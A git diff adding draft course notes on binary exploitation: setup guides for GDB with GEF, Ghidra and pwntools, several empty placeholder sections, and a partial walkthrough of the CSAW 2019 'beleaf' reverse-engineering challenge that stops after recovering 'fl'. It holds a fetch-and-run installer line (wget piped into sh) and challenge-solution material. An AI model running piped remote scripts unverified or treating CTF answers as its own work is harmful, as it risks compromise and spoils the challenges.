diff --git a/0.png b/0.png
new file mode 100644
index 0000000..fe66357
Binary files /dev/null and b/0.png differ
diff --git a/0/0.md b/0/0.md
new file mode 100644
index 0000000..3158083
--- /dev/null
+++ b/0/0.md
@@ -0,0 +1,38 @@
+# Binary Exploitation
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
diff --git a/0/1.png b/0/1.png
new file mode 100644
index 0000000..7e693b3
Binary files /dev/null and b/0/1.png differ
diff --git a/0/10.png b/0/10.png
new file mode 100644
index 0000000..6bb5f38
Binary files /dev/null and b/0/10.png differ
diff --git a/0/11.png b/0/11.png
new file mode 100644
index 0000000..dd0fa2e
Binary files /dev/null and b/0/11.png differ
diff --git a/0/2.png b/0/2.png
new file mode 100644
index 0000000..b04955d
Binary files /dev/null and b/0/2.png differ
diff --git a/0/3.png b/0/3.png
new file mode 100644
index 0000000..b31caa5
Binary files /dev/null and b/0/3.png differ
diff --git a/0/4.png b/0/4.png
new file mode 100644
index 0000000..8e89d9d
Binary files /dev/null and b/0/4.png differ
diff --git a/0/5.png b/0/5.png
new file mode 100644
index 0000000..aab18e1
Binary files /dev/null and b/0/5.png differ
diff --git a/0/6.png b/0/6.png
new file mode 100644
index 0000000..a10dad8
Binary files /dev/null and b/0/6.png differ
diff --git a/0/7.png b/0/7.png
new file mode 100644
index 0000000..f9b358a
Binary files /dev/null and b/0/7.png differ
diff --git a/0/8.png b/0/8.png
new file mode 100644
index 0000000..3cd79fc
Binary files /dev/null and b/0/8.png differ
diff --git a/0/9.png b/0/9.png
new file mode 100644
index 0000000..2086c21
Binary files /dev/null and b/0/9.png differ
diff --git a/0/gdb.md b/0/gdb.md
new file mode 100644
index 0000000..4e1ac8b
--- /dev/null
+++ b/0/gdb.md
@@ -0,0 +1,140 @@
+# GDB + GEF
+
+GDB, the GNU project debugger, allows you to see what is going on inside another program while it executes, or what said program was doing at the moment it crashed. GDB supports Ada, Assembly, C, C++, D, Frotan, Go, Objective-C, OpenCL, Modula-2, Pascal and Rust. For more information, click [here](https://www.gnu.org/software/gdb/).
+
+However, GDB is very old school, so we will use GEF to enhance the usage of gdb, it is a set of commands for x86/64, ARM, MIPS,PowerPC and SPARC that provides additional features to GDB using the Python API to assist during the dynamic analysis and exploit development. For more information, click [here](https://github.com/hugsy/gef).
+
+## Installation
+
+To install gdb you can find it in most repositories of popular linux distributions:
+
+
+ #Arch Linux:
+ [ 192.168.0.18/24 ] [ /dev/pts/15 ] [~]
+ → pacman -Ss gdb
+ extra/gdb 10.1-4
+ The GNU Debugger
+
+ [ 192.168.0.18/24 ] [ /dev/pts/15 ] [~]
+ → pacman -S gdb
+
+
+ #Kali / Debian:
+ [ 10.10.14.17/23 ] [ /dev/pts/3 ] [~]
+ → apt search gdb
+ gdb/kali-rolling,now 10.1-1.7 amd64 [installed]
+ GNU Debugger
+
+ [ 10.10.14.17/23 ] [ /dev/pts/3 ] [~]
+ → apt install gdb -y
+
+
+To install GEF we will follow the instructions from the main website:
+
+
+
+ [ 10.10.14.17/23 ] [ /dev/pts/3 ] [~]
+ → sh -c "$(wget http://gef.blah.cat/sh -O -)"
+ --2021-02-21 16:20:00-- http://gef.blah.cat/sh
+ Resolving gef.blah.cat (gef.blah.cat)... 40.121.232.30
+ Connecting to gef.blah.cat (gef.blah.cat)|40.121.232.30|:80... connected.
+ HTTP request sent, awaiting response... 301 Moved Permanently
+ Location: https://github.com/hugsy/gef/raw/master/scripts/gef.sh [following]
+ --2021-02-21 16:20:01-- https://github.com/hugsy/gef/raw/master/scripts/gef.sh
+ Resolving github.com (github.com)... 140.82.121.4
+ Connecting to github.com (github.com)|140.82.121.4|:443... connected.
+ HTTP request sent, awaiting response... 302 Found
+ Location: https://raw.githubusercontent.com/hugsy/gef/master/scripts/gef.sh [following]
+ --2021-02-21 16:20:01-- https://raw.githubusercontent.com/hugsy/gef/master/scripts/gef.sh
+ Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.109.133, 185.199.108.133, ...
+ Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 565 [text/plain]
+ Saving to: ‘STDOUT’
+
+ - 100%[=================================================================================================================================================================>] 565 --.-KB/s in 0s
+
+ 2021-02-21 16:20:01 (49.8 MB/s) - written to stdout [565/565]
+
+ sh: 6: test: unexpected operator
+
+ [ 10.10.14.17/23 ] [ /dev/pts/3 ] [~]
+ → ls -lash ~/.gdbinit
+ 4.0K -rw-r--r-- 1 nothing nothing 58 Feb 21 16:20 /home/nothing/.gdbinit
+
+
+
+Now when you try to launch gdb, you see that you are correctly launching gef:
+
+
+
+If you get any errors as you launch gdb - gef for the first time, just run the required pip install commands:
+
+
+
+
+ gef➤ q
+
+ [ 10.10.14.17/23 ] [ /dev/pts/3 ] [~]
+ → sudo apt install python3-pip -y
+
+ [ 10.10.14.17/23 ] [ /dev/pts/3 ] [~]
+ → pip3 install keystone-engine unicorn ropper
+ Collecting keystone-engine
+ Downloading keystone_engine-0.9.2-py2.py3-none-manylinux1_x86_64.whl (1.8 MB)
+ |████████████████████████████████| 1.8 MB 2.3 MB/s
+ Collecting unicorn
+ Downloading unicorn-1.0.2-py2.py3-none-manylinux1_x86_64.whl (8.1 MB)
+ |████████████████████████████████| 8.1 MB 6.3 MB/s
+ Collecting ropper
+ Downloading ropper-1.13.6.tar.gz (71 kB)
+ |████████████████████████████████| 71 kB 2.2 MB/s
+ Collecting filebytes>=0.10.0
+ Downloading filebytes-0.10.2.tar.gz (20 kB)
+ Building wheels for collected packages: ropper, filebytes
+ Building wheel for ropper (setup.py) ... done
+ Created wheel for ropper: filename=ropper-1.13.6-py3-none-any.whl size=99735 sha256=2f90a4e8a5b14f1c8c3abd0700b1e56ff8dbc7f3d165a5f69790c31cedd8948b
+ Stored in directory: /home/nothing/.cache/pip/wheels/77/a4/5d/a4bc1b653bdcce30a17b5cdda8f19da11444bb8640d03ab678
+ Building wheel for filebytes (setup.py) ... done
+ Created wheel for filebytes: filename=filebytes-0.10.2-py3-none-any.whl size=27853 sha256=17cf4812a6b16ee7c92a4ba259326c61fbfab4cf3c05ace2cb627a0de892d27f
+ Stored in directory: /home/nothing/.cache/pip/wheels/c2/51/58/98925d75705ee4df10da42a098d956183bb70661698fd07753
+ Successfully built ropper filebytes
+ Installing collected packages: keystone-engine, unicorn, filebytes, ropper
+ WARNING: The script ropper is installed in '/home/nothing/.local/bin' which is not on PATH.
+ Consider adding this directory to PATH or, if you prefer to suppress this warning, use --no-warn-script-location.
+ Successfully installed filebytes-0.10.2 keystone-engine-0.9.2 ropper-1.13.6 unicorn-1.0.2
+
+
+
+
+Once you're here, you're good to go
+
+
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
diff --git a/0/ghidra.md b/0/ghidra.md
new file mode 100644
index 0000000..7185970
--- /dev/null
+++ b/0/ghidra.md
@@ -0,0 +1,164 @@
+# Ghidra
+
+Ghidra is a software reverse engineering (SRE) framework created and maintained by the National Security Agency Research Directorate. This framework includes a suite of full-featured, high-end software analysis tools that enable users to analyze compiled code on a variety of platforms including Windows, macOS, and Linux. Capabilities include disassembly, assembly, decompilation, graphing, and scripting, along with hundreds of other features. Ghidra supports a wide variety of processor instruction sets and executable formats and can be run in both user-interactive and automated modes.
+
+## Installation
+
+To install Ghidra, we will follow the instructions listed [here](https://www.ghidra-sre.org/InstallationGuide.html)
+
+First install java:
+
+
+ [ 10.10.14.17/23 ] [ /dev/pts/3 ] [~]
+ → sudo apt update -y ; sudo apt upgrade -y ; sudo apt install default-jdk -y
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~]
+ → java -version
+ openjdk version "11.0.10" 2021-01-19
+ OpenJDK Runtime Environment (build 11.0.10+9-post-Debian-1)
+ OpenJDK 64-Bit Server VM (build 11.0.10+9-post-Debian-1, mixed mode, sharing)
+
+
+
+From here, just go to ghidra's main website to download the zip file:
+
+
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/Tools/ghidra]
+ → wget https://www.ghidra-sre.org/ghidra_9.2.2_PUBLIC_20201229.zip
+ --2021-02-21 23:10:29-- https://www.ghidra-sre.org/ghidra_9.2.2_PUBLIC_20201229.zip
+ Resolving www.ghidra-sre.org (www.ghidra-sre.org)... 13.249.9.44, 13.249.9.83, 13.249.9.20, ...
+ Connecting to www.ghidra-sre.org (www.ghidra-sre.org)|13.249.9.44|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 317805407 (303M) [application/zip]
+ Saving to: ‘ghidra_9.2.2_PUBLIC_20201229.zip’
+
+ ghidra_9.2.2_PUBLIC_20201229.zip 100%[=======================================================================================================================================================================================================>] 303.08M 10.9MB/s in 29s
+
+ 2021-02-21 23:10:58 (10.5 MB/s) - ‘ghidra_9.2.2_PUBLIC_20201229.zip’ saved [317805407/317805407]
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/Tools/ghidra]
+ → unzip ghidra_9.2.2_PUBLIC_20201229.zip
+
+
+Now from here, we need the ghidraRun binary to launch ghidra:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/Tools/ghidra]
+ → ls -l
+ total 310368
+ drwxr-xr-x 9 nothing nothing 4096 Dec 29 17:22 ghidra_9.2.2_PUBLIC
+ -rw-r--r-- 1 nothing nothing 317805407 Jan 19 17:53 ghidra_9.2.2_PUBLIC_20201229.zip
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/Tools/ghidra]
+ → cd ghidra_9.2.2_PUBLIC
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [Tools/ghidra/ghidra_9.2.2_PUBLIC]
+ → ls
+ docs Extensions Ghidra ghidraRun ghidraRun.bat GPL LICENSE licenses server support
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [Tools/ghidra/ghidra_9.2.2_PUBLIC]
+ → file ghidraRun
+ ghidraRun: Bourne-Again shell script, ASCII text executable
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [Tools/ghidra/ghidra_9.2.2_PUBLIC]
+ → cat ghidraRun
+ #!/usr/bin/env bash
+
+ #----------------------------------------
+ # Ghidra launch
+ #----------------------------------------
+
+ # Maximum heap memory may be changed if default is inadequate. This will generally be up to 1/4 of
+ # the physical memory available to the OS. Uncomment MAXMEM setting if non-default value is needed.
+ #MAXMEM=2G
+
+ # Resolve symbolic link if present and get the directory this script lives in.
+ # NOTE: "readlink -f" is best but works on Linux only, "readlink" will only work if your PWD
+ # contains the link you are calling (which is the best we can do on macOS), and the "echo" is the
+ # fallback, which doesn't attempt to do anything with links.
+ SCRIPT_FILE="$(readlink -f "$0" 2>/dev/null || readlink "$0" 2>/dev/null || echo "$0")"
+ SCRIPT_DIR="${SCRIPT_FILE%/*}"
+
+ # Launch Ghidra
+ "${SCRIPT_DIR}"/support/launch.sh bg Ghidra "${MAXMEM}" "" ghidra.GhidraRun "$@"
+
+
+To make it more convenient, i make a symlink to a folder in PATH:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [Tools/ghidra/ghidra_9.2.2_PUBLIC]
+ → echo $PATH
+ /usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [Tools/ghidra/ghidra_9.2.2_PUBLIC]
+ → sudo ln -s $(pwd)/ghidraRun /usr/bin/ghidra
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [Tools/ghidra/ghidra_9.2.2_PUBLIC]
+ → ls -lash /usr/bin/ghidra
+ 0 lrwxrwxrwx 1 root root 56 Feb 21 23:19 /usr/bin/ghidra -> /home/nothing/Tools/ghidra/ghidra_9.2.2_PUBLIC/ghidraRun
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [Tools/ghidra/ghidra_9.2.2_PUBLIC]
+ → which ghidra
+ /usr/bin/ghidra
+
+
+
+From here you can just type ghidra in your terminal or in dmenu or rofi or whatever you want, it will open up ghidra for you:
+
+
+
+Here you get a nice tutorial to let you know about ghidra's functionnalities, but you will want to create a new project and giving it a directory location:
+
+
+
+Just to test, we're going to copy a random binary locally and import it
+
+
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/3 ] [~/binexp]
+ → cp /bin/lspci .
+
+ [ 192.168.100.126/24 ] [ /dev/pts/3 ] [~/binexp]
+ → ls -lash lspci
+ 92K -rwxr-xr-x 1 nothing nothing 92K Feb 21 23:27 lspci
+
+
+
+`   
+
+And there you have it! You now have an imported a binary file to disassemble.
+
+ ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
diff --git a/0/pwntools.md b/0/pwntools.md
new file mode 100644
index 0000000..336544c
--- /dev/null
+++ b/0/pwntools.md
@@ -0,0 +1,86 @@
+# Python Pwntools
+
+Pwntools is a python ctf library designed for rapid exploit development. It helps us write exploits quickly, thanks to the functionnalities behind it. Pwntools has python2 and python3 versions, In this course we will use the python3 version since it is the most up to date.
+
+## Installation
+
+The installation is fairly simple. Make sure you have python3 and python3-pip installed on your system, then run the following:
+
+
+
+ [ 10.10.14.17/23 ] [ /dev/pts/3 ] [~]
+ → which python3 pip3
+ /usr/bin/python3
+ /usr/bin/pip3
+
+
+ [ 10.10.14.17/23 ] [ /dev/pts/3 ] [~]
+ → sudo pip3 install pwn
+ [sudo] password for nothing:
+
+ Collecting pwn
+ Downloading pwn-1.0.tar.gz (1.1 kB)
+ Collecting pwntools
+ Downloading pwntools-4.3.1-py2.py3-none-any.whl (10.0 MB)
+ |████████████████████████████████| 10.0 MB 12.3 MB/s
+ Requirement already satisfied: six>=1.12.0 in /usr/lib/python3/dist-packages (from pwntools->pwn) (1.15.0)
+ Requirement already satisfied: pyserial>=2.7 in /usr/lib/python3/dist-packages (from pwntools->pwn) (3.5b0)
+ Requirement already satisfied: requests>=2.0 in /usr/lib/python3/dist-packages (from pwntools->pwn) (2.25.1)
+ Requirement already satisfied: pygments>=2.0 in /usr/lib/python3/dist-packages (from pwntools->pwn) (2.7.1)
+ Requirement already satisfied: intervaltree>=3.0 in /usr/lib/python3/dist-packages (from pwntools->pwn) (3.0.2)
+ Requirement already satisfied: paramiko>=1.15.2 in /usr/lib/python3/dist-packages (from pwntools->pwn) (2.7.2)
+ Requirement already satisfied: sortedcontainers in /usr/lib/python3/dist-packages (from pwntools->pwn) (2.1.0)
+ Requirement already satisfied: python-dateutil in /usr/lib/python3/dist-packages (from pwntools->pwn) (2.8.1)
+ Requirement already satisfied: packaging in /usr/lib/python3/dist-packages (from pwntools->pwn) (20.8)
+ Requirement already satisfied: pysocks in /usr/lib/python3/dist-packages (from pwntools->pwn) (1.7.1)
+ Collecting unicorn<1.0.2rc4,>=1.0.2rc1
+ Downloading unicorn-1.0.2rc3-py2.py3-none-manylinux1_x86_64.whl (8.1 MB)
+ |████████████████████████████████| 8.1 MB 4.2 MB/s
+ Requirement already satisfied: mako>=1.0.0 in /usr/lib/python3/dist-packages (from pwntools->pwn) (1.1.3)
+ Requirement already satisfied: pip>=6.0.8 in /usr/lib/python3/dist-packages (from pwntools->pwn) (20.1.1)
+ Collecting ropgadget>=5.3
+ Downloading ROPGadget-6.5-py3-none-any.whl (31 kB)
+ Requirement already satisfied: capstone>=3.0.5rc2 in /usr/lib/python3/dist-packages (from pwntools->pwn) (4.0.2)
+ Requirement already satisfied: pyelftools>=0.2.4 in /usr/lib/python3/dist-packages (from pwntools->pwn) (0.27)
+ Requirement already satisfied: psutil>=3.3.0 in /usr/lib/python3/dist-packages (from pwntools->pwn) (5.7.3)
+ Building wheels for collected packages: pwn
+ Building wheel for pwn (setup.py) ... done
+ Created wheel for pwn: filename=pwn-1.0-py3-none-any.whl size=1220 sha256=35c1e3da705801680c0b2d0b440b1da8836bc2b32b4343d4aa751ffcf26abf78
+ Stored in directory: /root/.cache/pip/wheels/34/a6/82/682ac94b58ae2e949908f11392d778574372a6cedc78b4b0a5
+ Successfully built pwn
+ Installing collected packages: unicorn, ropgadget, pwntools, pwn
+ Successfully installed pwn-1.0 pwntools-4.3.1 ropgadget-6.5 unicorn-1.0.2rc3
+
+
+
+If you want the full documentation on pwntools, click [here](https://docs.pwntools.com/en/stable/).
+
+![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
diff --git a/1/0.md b/1/0.md
new file mode 100644
index 0000000..bd2c701
--- /dev/null
+++ b/1/0.md
@@ -0,0 +1,84 @@
+# Binary Exploitation
+
+## Downloading the binary file
+
+
+
+
+` ![]()
+
+## Solution
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
diff --git a/1/1.png b/1/1.png
new file mode 100644
index 0000000..032bc3e
Binary files /dev/null and b/1/1.png differ
diff --git a/1/2.png b/1/2.png
new file mode 100644
index 0000000..c46127d
Binary files /dev/null and b/1/2.png differ
diff --git a/1/3.png b/1/3.png
new file mode 100644
index 0000000..ee66043
Binary files /dev/null and b/1/3.png differ
diff --git a/1/4.png b/1/4.png
new file mode 100644
index 0000000..63dfeef
Binary files /dev/null and b/1/4.png differ
diff --git a/1/5.png b/1/5.png
new file mode 100644
index 0000000..01d4915
Binary files /dev/null and b/1/5.png differ
diff --git a/1/6.png b/1/6.png
new file mode 100644
index 0000000..4ddd006
Binary files /dev/null and b/1/6.png differ
diff --git a/1/7.png b/1/7.png
new file mode 100644
index 0000000..a471f1a
Binary files /dev/null and b/1/7.png differ
diff --git a/1/beleaf.md b/1/beleaf.md
new file mode 100644
index 0000000..8117448
--- /dev/null
+++ b/1/beleaf.md
@@ -0,0 +1,402 @@
+# CSAW 2019 Beleaf
+
+## Downloading the binary file
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/1]
+ → wget https://github.com/guyinatuxedo/nightmare/raw/master/modules/03-beginner_re/csaw19_beleaf/beleaf
+ --2021-02-22 19:55:50-- https://github.com/guyinatuxedo/nightmare/raw/master/modules/03-beginner_re/csaw19_beleaf/beleaf
+ Resolving github.com (github.com)... 140.82.121.4
+ Connecting to github.com (github.com)|140.82.121.4|:443... connected.
+ HTTP request sent, awaiting response... 302 Found
+ Location: https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/03-beginner_re/csaw19_beleaf/beleaf [following]
+ --2021-02-22 19:55:51-- https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/03-beginner_re/csaw19_beleaf/beleaf
+ Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.110.133, 185.199.108.133, 185.199.111.133, ...
+ Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.110.133|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 7624 (7.4K) [application/octet-stream]
+ Saving to: ‘beleaf’
+
+ beleaf 100%[===============================================================================>] 7.45K --.-KB/s in 0.01s
+
+ 2021-02-22 19:55:51 (676 KB/s) - ‘beleaf’ saved [7624/7624]
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/1]
+ → file beleaf
+ beleaf: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=6d305eed7c9bebbaa60b67403a6c6f2b36de3ca4, stripped
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/1]
+ → chmod +x beleaf
+
+
+
+` ![]()
+
+## Solution
+
+Now, first things first, we are going to use pwntools' pwn tool to check the security of the binary file itself.
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/1]
+ → pwn checksec beleaf
+ [*] '/home/nothing/binexp/1/beleaf'
+ Arch: amd64-64-little
+ RELRO: Full RELRO
+ Stack: Canary found
+ NX: NX enabled
+ PIE: PIE enabled
+
+
+
+So we are dealing with a 64bit binary, that scans the input of the user and then checks it, very much like the previous challenge we solved, [helithumper](heli.html). So we're going to import the file into ghidra, and take a look at the main function
+
+
+
+Here the main function is not called 'main' like in the previous challenge, to do so i had to look for the 'Enter the flag >>>" print statement which happened to be in the FUN_001008a1 function as you can see in the screenshot above. The code that ghidra gives us says that our text input is called 'local_98' and then later on the length of our text input is passed into sVar1
+
+
+ undefined8 FUN_001008a1(void)
+
+ {
+ size_t sVar1;
+ long lVar2;
+ long in_FS_OFFSET;
+ ulong local_b0;
+ char local_98 [136];
+ long local_10;
+
+ local_10 = *(long *)(in_FS_OFFSET + 0x28);
+ printf("Enter the flag\n>>> ");
+ __isoc99_scanf(&DAT;_00100a78,local_98);
+ sVar1 = strlen(local_98);
+ if (sVar1 < 0x21) {
+ puts("Incorrect!");
+ /* WARNING: Subroutine does not return */
+ exit(1);
+ }
+ local_b0 = 0;
+ while (local_b0 < sVar1) {
+ lVar2 = FUN_001007fa((int)local_98[local_b0]);
+ if (lVar2 != *(long *)(&DAT;_003014e0 + local_b0 * 8)) {
+ puts("Incorrect!");
+ /* WARNING: Subroutine does not return */
+ exit(1);
+ }
+ local_b0 = local_b0 + 1;
+ }
+ puts("Correct!");
+ if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
+ /* WARNING: Subroutine does not return */
+ __stack_chk_fail();
+ }
+ return 0;
+ }
+
+
+now let's look at what we need to get the 'correct' output, first of all if our input LENGTH (sVar1) is less than 0x21 or 33 bytes, we will get 'incorrect', so we need at least 33 characters:
+
+
+ if (sVar1 < 0x21) {
+ puts("Incorrect!");
+ /* WARNING: Subroutine does not return */
+ exit(1);
+
+
+Then we see that we enter a for loop (which is a while loop with a variable being incremented (here it is local_b0))
+
+
+ while (local_b0 < sVar1) {
+ lVar2 = FUN_001007fa((int)local_98[local_b0]);
+ if (lVar2 != *(long *)(&DAT;_003014e0 + local_b0 * 8)) {
+ puts("Incorrect!");
+ /* WARNING: Subroutine does not return */
+ exit(1);
+ }
+ local_b0 = local_b0 + 1;
+ }
+ puts("Correct!");
+
+
+in this for loop, each character of our text input (local_98 at the index 0,1,2,3 ... 32) gets passed into the 'FUN_001007fa' function the result of that function gets passed to the if statement as 'lVar2' to get checked against a certain '&DAT;_003014e0' which is basically an array, the if statement checks for the characters at offsets of 8. So let's double click it to see what it is:
+
+
+ DAT_003014e0 XREF[2]: FUN_001008a1:0010096b(*),
+ FUN_001008a1:00100972(R)
+ 003014e0 01 ?? 01h
+
+ 003014e1 00 ?? 00h
+ 003014e2 00 ?? 00h
+ 003014e3 00 ?? 00h
+ 003014e4 00 ?? 00h
+ 003014e5 00 ?? 00h
+ 003014e6 00 ?? 00h
+ 003014e7 00 ?? 00h
+ 003014e8 09 ?? 09h
+
+ 003014e9 00 ?? 00h
+ 003014ea 00 ?? 00h
+ 003014eb 00 ?? 00h
+ 003014ec 00 ?? 00h
+ 003014ed 00 ?? 00h
+ 003014ee 00 ?? 00h
+ 003014ef 00 ?? 00h
+ 003014f0 11 ?? 11h
+
+ 003014f1 00 ?? 00h
+ 003014f2 00 ?? 00h
+ 003014f3 00 ?? 00h
+ 003014f4 00 ?? 00h
+ 003014f5 00 ?? 00h
+ 003014f6 00 ?? 00h
+ 003014f7 00 ?? 00h
+ 003014f8 27 ?? 27h '
+
+ 003014f9 00 ?? 00h
+ 003014fa 00 ?? 00h
+ 003014fb 00 ?? 00h
+ 003014fc 00 ?? 00h
+ 003014fd 00 ?? 00h
+ 003014fe 00 ?? 00h
+ 003014ff 00 ?? 00h
+ 00301500 02 ?? 02h
+
+
+
+And here we see the bytes we need are at offsets of 8, so we have the following:
+
+
+ 0x1 0x9 0x11 0x27 0x2
+
+
+Now let's take a look at the 'FUN_001007fa' function that checks each of our input text characters:
+
+
+
+
+ long FUN_001007fa(char param_1)
+
+ {
+ long local_10;
+
+ local_10 = 0;
+ while ((local_10 != -1 && ((int)param_1 != *(int *)(&DAT;_00301020 + local_10 * 4)))) {
+ if ((int)param_1 < *(int *)(&DAT;_00301020 + local_10 * 4)) {
+ local_10 = local_10 * 2 + 1;
+ }
+ else {
+ if (*(int *)(&DAT;_00301020 + local_10 * 4) < (int)param_1) {
+ local_10 = (local_10 + 1) * 2;
+ }
+ }
+ }
+ return local_10;
+ }
+
+
+in here, each character of our input text gets passed as the param_1 charcater, and then the function basically looks at the 'DAT_003014e0' array with offsets of 4, the function tries to find at which index our input text characters are in this array, so let's see what is in that 'DAT_003014e0' array
+
+
+ DAT_00301020 XREF[6]: FUN_001007fa:00100820(*),
+ FUN_001007fa:00100827(R),
+ FUN_001007fa:00100844(*),
+ FUN_001007fa:0010084b(R),
+ FUN_001007fa:00100873(*),
+ FUN_001007fa:0010087a(R)
+ 00301020 77 ?? 77h w
+
+ 00301021 00 ?? 00h
+ 00301022 00 ?? 00h
+ 00301023 00 ?? 00h
+ 00301024 66 ?? 66h f
+
+ 00301025 00 ?? 00h
+ 00301026 00 ?? 00h
+ 00301027 00 ?? 00h
+ 00301028 7b ?? 7Bh {
+
+ 00301029 00 ?? 00h
+ 0030102a 00 ?? 00h
+ 0030102b 00 ?? 00h
+ 0030102c 5f ?? 5Fh _
+
+ 0030102d 00 ?? 00h
+ 0030102e 00 ?? 00h
+ 0030102f 00 ?? 00h
+ 00301030 6e ?? 6Eh n
+
+ 00301031 00 ?? 00h
+ 00301032 00 ?? 00h
+ 00301033 00 ?? 00h
+ 00301034 79 ?? 79h y
+
+ 00301035 00 ?? 00h
+ 00301036 00 ?? 00h
+ 00301037 00 ?? 00h
+ 00301038 7d ?? 7Dh }
+
+ 00301039 00 ?? 00h
+ 0030103a 00 ?? 00h
+ 0030103b 00 ?? 00h
+ 0030103c ff ?? FFh
+ 0030103d ff ?? FFh
+ 0030103e ff ?? FFh
+ 0030103f ff ?? FFh
+ 00301040 62 ?? 62h b
+
+ 00301041 00 ?? 00h
+ 00301042 00 ?? 00h
+ 00301043 00 ?? 00h
+ 00301044 6c ?? 6Ch l
+
+ 00301045 00 ?? 00h
+ 00301046 00 ?? 00h
+ 00301047 00 ?? 00h
+ 00301048 72 ?? 72h r
+
+ 00301049 00 ?? 00h
+ 0030104a 00 ?? 00h
+ 0030104b 00 ?? 00h
+ 0030104c ff ?? FFh
+ 0030104d ff ?? FFh
+ 0030104e ff ?? FFh
+ 0030104f ff ?? FFh
+ 00301050 ff ?? FFh
+ 00301051 ff ?? FFh
+ 00301052 ff ?? FFh
+ 00301053 ff ?? FFh
+ 00301054 ff ?? FFh
+ 00301055 ff ?? FFh
+ 00301056 ff ?? FFh
+ 00301057 ff ?? FFh
+ 00301058 ff ?? FFh
+ 00301059 ff ?? FFh
+ 0030105a ff ?? FFh
+ 0030105b ff ?? FFh
+ 0030105c ff ?? FFh
+ 0030105d ff ?? FFh
+ 0030105e ff ?? FFh
+ 0030105f ff ?? FFh
+ 00301060 ff ?? FFh
+ 00301061 ff ?? FFh
+ 00301062 ff ?? FFh
+ 00301063 ff ?? FFh
+ 00301064 61 ?? 61h a
+
+ 00301065 00 ?? 00h
+ 00301066 00 ?? 00h
+ 00301067 00 ?? 00h
+ 00301068 65 ?? 65h e
+
+ 00301069 00 ?? 00h
+ 0030106a 00 ?? 00h
+ 0030106b 00 ?? 00h
+ 0030106c 69 ?? 69h i
+ [...]
+
+
+
+now when you look at the characters in this array, you can get the feeling that you might be able to type flag{something} with it, so let's follow what the code does with the 2 arrays we found:
+
+we know that the start of the 1020array is 00301020. The character f will output 1 because **((0x00301024 - 0x00301020) / 4) = 1** so this is equal to 1. This 1 also corresponds to the 14e0 array from earlier:
+
+
+ DAT_003014e0 XREF[2]: FUN_001008a1:0010096b(*),
+ FUN_001008a1:00100972(R)
+ 003014e0 01 ?? 01h
+
+ 003014e1 00 ?? 00h
+ 003014e2 00 ?? 00h
+ 003014e3 00 ?? 00h
+ 003014e4 00 ?? 00h
+ 003014e5 00 ?? 00h
+ 003014e6 00 ?? 00h
+ 003014e7 00 ?? 00h
+ 003014e8 09 ?? 09h
+
+ 003014e9 00 ?? 00h
+ 003014ea 00 ?? 00h
+ 003014eb 00 ?? 00h
+ 003014ec 00 ?? 00h
+ 003014ed 00 ?? 00h
+ 003014ee 00 ?? 00h
+ 003014ef 00 ?? 00h
+ 003014f0 11 ?? 11h
+
+ 003014f1 00 ?? 00h
+ 003014f2 00 ?? 00h
+ 003014f3 00 ?? 00h
+ 003014f4 00 ?? 00h
+ 003014f5 00 ?? 00h
+ 003014f6 00 ?? 00h
+ 003014f7 00 ?? 00h
+ 003014f8 27 ?? 27h '
+
+ 003014f9 00 ?? 00h
+ 003014fa 00 ?? 00h
+ 003014fb 00 ?? 00h
+ 003014fc 00 ?? 00h
+ 003014fd 00 ?? 00h
+ 003014fe 00 ?? 00h
+ 003014ff 00 ?? 00h
+ 00301500 02 ?? 02h
+
+ [...]
+
+
+
+and here you have to continue with the 0x9 value,**(0x00301020 + (4*9)) = 0x301044** this address corresponds to the l character
+
+
+ fl
+
+
+
